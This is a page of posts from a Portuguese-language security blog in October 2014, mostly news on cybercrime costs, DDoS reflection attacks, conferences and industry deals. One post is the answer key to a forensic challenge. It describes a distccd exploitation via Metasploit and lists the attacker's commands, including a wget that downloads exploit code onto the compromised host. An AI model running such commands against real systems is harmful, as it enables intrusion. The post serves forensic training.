[Notícia] Cibercrime custa $12,7 milhões por ano a grandes empresas nos EUA

Por Editor em 21 de outubro de 2014 | Enviar comentário

Ataques cibernéticos a grandes companhias resultam em média em um prejuízo de $12,7 milhões anuais, um crescimento de 9,7% em relação ao ano passado, de acordo com o quinto relatório “Cost of Cybercrime” publicado pelo instituto Ponemon.

De acordo com  levantamento, interrupções em negócios e perda de informação correspondem  a aproximadamente 3/4 do custo total, e que empresas priorizando a segurança tem os gastos de incidentes reduzidos, no ano.

Os maiores gastos registrados foram em empresas de energia, empresas públicas e da indústria financeira.

Fonte

 

AddThis Social Bookmark Button

[Notícia] SegInfocast #18 – Análise de Malware – Botnets

Por Editor em 20 de outubro de 2014 | Enviar comentário

seginfo castSegInfocast #18: Faça o download aqui.

Nesta nova edição do SegInfocast, apresentamos o aúdio do Webinar #24 da Clavis Segurança da Informação cujo tema foi Análise de Malware – Botnets.

O webinar apresentou o conceito de botnets e um estudo de caso envolvendo comando e controle via IRC. O objetivo deste webinar é passar o conhecimento ao espectador a preparar e adequar seu ambiente de análise a fim de descobrir especificidades de um malware utilizando de ferramentas de análise de código e comportamental.

SegInfocast #18: Faça o download aqui.

Play
AddThis Social Bookmark Button

[Notícia] IT Forum Expo/ Black Hat terá 2 conferências simultâneas e conteúdo diversificado

Por Editor em 16 de outubro de 2014 | Enviar comentário

it_forum_bh_2014

Diversidade e conteúdo exclusivo. Pensando nesses dois pilares, IT Forum Expo / Black Hat, principal feira de Tecnologia da Informação da América Latina discute, nos dias 25 e 26 de novembro, diversos temas e desafios sobre o setor de TI em relação ao Cloud Computing, Big Data, Mobilidade, Social Business e Segurança em TI. Serão duas grades simultâneas de conferências: o IT Forum Expo Conference e o Black Hat Regional Summit que acontecerão dentro de uma única feira. O destaque fica para a abertura dos dois dias de palestras com os keynotes speakers Ethan Zucherman, diretor do Center for Civic Media do MIT, professor do Media Lab e  co-fundador da comunidade Global Voices e Derrick de Kerckhove, professor da Universidade de Toronto.

No IT Forum Expo Conference, o participante encontrará conteúdo completo em debates que apresentarão casos práticos, novas soluções e tendências sobre o mercado de TI em carreiras, marketing digital e tecnologia. Palestras como: “A migração do marketing tradicional para o digital”, “Arquitetura empresarial em nuvem”, “IoT – O que temos e quais os desafios”; “Interação Human to Human”, “Map Reduce e Hadoop em detalhes”, Modelos de Negócios Digitais para Startups” e “Design Thinking na Liderança: criatividade e geração de ideias” são algumas das opções da programaçãoEstão confirmados para o evento renomados profissionais da área.

Já o Black Hat Regional Summit, maior referência em segurança da informação do mundo e em sua 2º edição aqui no Brasil, apresentará palestras e treinamentos com alto nível ministrados pelos mais respeitados especialistas do mundo abordando temas como proteção para espionagem virtual e atividades inapropriadas, novas criptografias, perdas de segurança por falta de tradução, senhas craqueadas e novas funções de segurança para smartphones, no caso do sistema Android.

Rafael Schaefer, da Universidade de Bonn-Rhein-Sieg de Ciências Aplicadas e Christopher Werny, analista e chefe da equipe de segurança da rede ERNW (serviços de segurança em TI da Alemanha) ministrarão o Workshop Prático sobre “IPV6 Ataques e Defesas”, que promete ser uma troca de experiências por meio de aplicações e testes instantâneos.

Organizado pela UBM Brazil em parceira com a IT Midia, a feira espera um público de mais de 5 mil visitantes altamente qualificados – executivos que fazem parte do processo de decisão dentro das empresas, gerentes de TI e projetos em um espaço que une as soluções de TI e segurança da informação e apresenta inovações em produtos e serviços de empresas como Sa, Samsung, Cisco, Qualys, Locaweb, Blackberry, entre outras. O credenciamento online para visitar a área de exposição já está no ar, é gratuito e outras informações – como a grade completa e valores dos programas de conferências – podem ser obtidas em www.itforumexpo.com.br.

IT Forum Expo/Black Hat conta com o apoio de mídia do Blog Seginfo.

 

AddThis Social Bookmark Button

[Notícia] No próximo domingo (19) começa o horário de verão – Entenda a relação com a Segurança da Informação

Por Editor em 15 de outubro de 2014 | Enviar comentário

logo-ntpO horário de verão terá início no próximo domingo (19 de outubro) à zero hora e término à zero hora de 22 de fevereiro de 2015. Moradores da região Sul, Sudeste e Centro-Oeste terão que adiantar seus relógios em 1 hora.

Segundo o Centro de Atendimento a Incidentes de Segurança (CAIS), da Rede Nacional de Ensino e Pesquisa (RNP), “tratando-se de incidentes de segurança, a precisão dos relógios dos sistemas é fundamental para manter a consistência dos logs, além de ser imprescindível nas investigações e identificação de responsáveis”.

Os servidores NTP, citados acima, são máquinas dedicadas a servir o horário correto utilizando o protocolo NTP (Network Time Protocol), que é o mais recomendado por ter implementação para os mais variados sistemas. Esses servidores podem ser implementados localmente (uma máquina dedicada em sua rede interna) ou serem utilizados pela internet. No Brasil, temos o NTP.br, serviço oficial oferecido pela RNP (Rede Nacional de Pesquisa, órgão responsável por gerir a Internet no país), que distribui a “Hora Legal Brasileira“, definida pelo Observatório Nacional.

Segue lista de Estados que terão que adiantar seus relógios: Rio Grande do Sul, Santa Catarina, Paraná, São Paulo, Rio de Janeiro, Espírito Santo, Minas Gerais, Goiás, Mato Grosso, Mato Grosso do Sul e  Distrito Federal.

Para mais informações sobre o serviço nacional, visite o domínio NTP.br. O portal fornece todas as informações necessárias para implementação, ajustes e utilização do NTP no Brasil.

AddThis Social Bookmark Button

[Notícia] Estudo aponta aumento de ataques DDoS refletidos

Por Editor em 14 de outubro de 2014 | Enviar comentário

investimento_crescimentoA Arbor Networks divulgou novo relatório contendo dados sobre ataques DDoS, os quais foram coletados a partir de sua infraestrutura ATLAS de monitoramento de ameaçasO relatório conclui que os ataques DDoS em larga escala estão aumentando em frequência, corroborando com a pesquisa publicada pela empresa NSFOCUS e discorre sobre os dados revelados no relatório anterior da Arbor Networks, divulgado recentemente aqui no blog.  

Os dados apontam um aumento notável em ataques DDoS utilizando o protocolo Simple Service Discovery Protocol (SSDP) como mecanismo para reflexão. Estes ataques foram responsáveis por 9% de todos os ataques DDoS no mês de setembro de 2014, sendo que 42% dos ataques maiores de 10Gbps aparentavam utilizar reflexão por SSDP.

Não obstante, apesar de terem diminuído em frequência, ataques explorando servidores ​​Network Time Protocol (NTP) vulneráveis continuam a ser relevantes, correspondendo por mais de 50% dos maiores ataques, os quais registram mais de 100Gbps. Os ataques também vem apresentando diminuição na duração, tendo o número de eventos com duração inferior a uma hora aumentado para 91,2%. Entre os ataques maiores de 10Gbps, os EUA (7.6%), China (5.9%) e Brasil (1.1%) são as principais fontes dos ataques. Em contrapartida, os EUA (17.6%), França (10.8%) e Dinamarca (8.4%) figuram entre os principais alvos.

Considerando a relevância continuada dos ataques NTP e o surgimento repentino de ataques SSDP, os quais devem cada vez se tornarem mais frequentes, não é surpresa que os ataques DDoS de grande volume são mais comuns do que nunca. Apenas no ano de 2014, foram registrados 133 ataques DDoS superiores a 100Gbps. Segundo alerta de Darren Anstee, Diretor de Soluções da Arbor Networks, as organizações devem se certificar que suas defesas são capazes de lidar com ataques originários de ambas as fontes.

Maiores informações através do link.

AddThis Social Bookmark Button

[Notícia] 133 ataques DDoS acima de 100Gbps até o 3º trimestre de 2014

Por Editor em 13 de outubro de 2014 | Enviar comentário

globe-cyberwarA Arbor Networks divulgou dados de ataques DDoS globais para o terceiro trimestre de 2014, mostrando um aumento notável no Simple Service Discovery Protocol (SSDP) em ataques de reflexão. Arbor monitorou poucos ataques usando SSDP como um mecanismo de reflexão no segundo trimestre, mas cerca de 30.000 ataques com este protocolo foram explorados no terceiro trimestre, entre um deles atingindo 124Gbps.

Alguns achados importantes:

- Crescimento significativo no uso de SSDP para ataques de reflexão, 4% de todos os ataques e 42% de todos os ataques superiores a 10 Gbps usaram SSDP, no terceiro trimestre;
– Ataques de reflexão NTP ainda significativos, mais de 50% de todos os ataques superiores a 100 Gbps, porém, tendendo a cair;
– Ataques volumétricos muito mais frequentes. 133 ataques com mais de 100Gbps neste ano;
– Fontes para eventos maiores do que 10 Gbps: Estados Unidos ( 7,6% ), China ( 5,9%), Brasil (1,1%).

“Todo mundo está ciente da enorme tempestade de ataques de reflexão NTP no primeiro trimestre e no segundo, embora ataques de reflexão NTP  ainda sejam significantes, não há muito acontecendo como já houve – infelizmente, parece que o SSDP vai ser o próximo protocolo a ser explorado. As organizações devem tomar cuidado e garantir que a sua defesa DDoS é multi-camadas e projetada para lidar com ambos os ataques que podem saturar a sua conectividade, e os sofisticados ataques na camada de aplicação”, disse o Diretor de Arquiteturas e Soluções Darren Anstee da Arbor Networks .

Fonte neste link.

AddThis Social Bookmark Button

[Notícia] Pesquisa aponta o crescimento no interesse em carreiras de segurança em TI

Por Editor em 8 de outubro de 2014 | Enviar comentário

carreiraA demanda por profissionais de segurança cibernética está crescendo 3,5 vezes mais rápido do que o mercado global de trabalho de TI e 12 vezes mais rápido do que todo o mercado de trabalho, de acordo com a Raytheon e a NCSA.

A pesquisa aponta que um em cada quatro adultos jovens estão interessados ​​em uma carreira em segurança cibernética, mas 64 por cento disseram que sua escola não ofereceu uma base ou classes necessárias para prosseguir uma carreira em segurança cibernética ou ciência da computação. Fazendo uma comparação, a pesquisa do ano passado afirmava que cerca de 40 por cento dos entrevistados disseram que estão mais interessados ​​hoje em carreiras que envolvem a tornar a Internet mais segura do que eram há um ano.

“Altas violações de segurança cibernética no ano passado ajudaram a aumentar a consciência e trouxeram questões de segurança on-line para as discussões em sala de aula. Um buraco na educação tecnológica está se fechando”, disse Michael Kaiser, diretor-executivo da National Cyber ​​Security Alliance. “Entretanto, nossos achados, mais uma vez ilustram que ainda há uma grande oportunidade para coincidir o crescente interesse em cibersegurança com mais informações enquanto alunos começam a explorar carreiras e estabelecer sua presença on-line.”

Conheça os próximos cursos da Academia Clavis que preparam para a carreira de Segurança da Informação.

Mais informações neste link.

AddThis Social Bookmark Button

[Desafios] Desafio #5 Blog SegInfo – Gabarito de Análise Forense Computacional

Por Editor em 7 de outubro de 2014 | Enviar comentário

WarGames mão verde

Revelaremos agora a resposta do último Desafio SegInfo, publicado em 23 de setembro de 2014 aqui no blog.

- Qual foi o primeiro scan realizado? Qual ferramenta foi utilizada? Quais portas foram escaneadas?

R: Syn Scan utilizando Nmap nas portas 1-65534.

- Quais os IPs do atacante e da vítima?

R: Atacante: 192.168.56.102, Vítima: 192.168.56.101

- Um segundo scan foi realizado. Qual(is) porta(s) foi(ram) escaneada(s)? Qual o serviço vulnerável?
R: Porta 3632. Serviço distccd. Através do serviço foi executado um script ruby e aberto socket na porta 4444. A ferramenta utilizada foi o Metasploit Framework.

- Quais comandos foram inseridos após a invasão ter sido efetuada?

R: cd /tmp, uname -a, whoami, wget http://www.exploit-db.com/download/15704 -O 15704.c e ls -l

Parabéns por resolver o desafio da Clavis Segurança da Informação. É isso pessoal, até o próximo desafio! (:

Conheça o curso sobre Análise de Malware em Forense Computacional oferecido pela Academia Clavis!

AddThis Social Bookmark Button

[Notícia] AVG compra Winco, distribuidora exclusiva de suas soluções no Brasil

Por Editor em 6 de outubro de 2014 | Enviar comentário

avg_logoA AVG Technologies, fabricante de softwares de segurança famosa pelo seu antivírus gratuito, anunciou que está em processo de aquisição da Winco, sua distribuidora no Brasil há 11 anos. Segundo divulgado em nota, a decisão foi tomada com base na importância do mercado brasileiro para a companhia. Além disso, a companhia procura se aproveitar de um momento de transição das empresas concorrentes no Brasil, tendo a Symantec e a McAfee reestruturado recentemente suas diretorias.

A aquisição faz parte de um movimento da AVG para adquirir todos os seus cinco distribuidores regionais. A representante do Reino Unido foi a primeira e a Winco foi a última. O plano é qualificar o atendimento e suporte aos consumidores, além de apoiar e impulsionar a entrada de novos produtos e serviços, tanto para os consumidores finais quanto para o crescente mercado de pequenas e médias empresas.

A Winco foi fundada em 1997 e é sediada em São Paulo, possuindo 30 funcionários e cerca de 1,2 mil pontos de vendas no país. O quadro de funcionários e a diretoria não serão mexidos no momento. No entanto, com a aquisição a companhia deve ser dividida em duas, uma que será dedicada à AVG e outra, que continuará criando e desenvolvendo seus produtos de segurança e controle de acesso à Internet, tais como o Winconnection,  Winconnection Web Filter,  Winconnection VPN-SSL e o Sistema DDNS.

Maiores informações através do link.

AddThis Social Bookmark Button

[Notícia] 12ª edição da Revista Segurança Digital – Espionagem Digital (via @_SegDigital)

Por Editor em 2 de outubro de 2014 | Enviar comentário

12_edicao_setembro_16_09_2014Foi lançada a décima segunda edição da Revista Segurança Digital tendo como tema principal espionagem digital.

Nosso colunista Yuri Diogenes (@yuridiogenes), participa desta edição com o artigo Segurança da Informação para Todos: “Este artigo tem como finalidade enumerar as necessidades de se criar um conhecimento básico de segurança da informação para o cidadão, através da educação quanto ao uso correto e responsável dos recursos tecnológicos disponíveis atualmente. Em uma entrevista que concedi ao Programa Pode Entrar da TVC em Julho de 2012, eu citei justamente a necessidade de investimento nesta área.”, cita Yuri na introdução do artigo. Além de colunista do Blog SegInfo, é também instrutor dos cursos CompTIA Security+ e CompTIA Cloud Essentials na Academia Clavis.

Esse é um dos artigos que compõe a 12ª edição da Revista Segurança Digital, que tem sua  distribuição gratuita disponível para download no site: http://segurancadigital.info/

AddThis Social Bookmark Button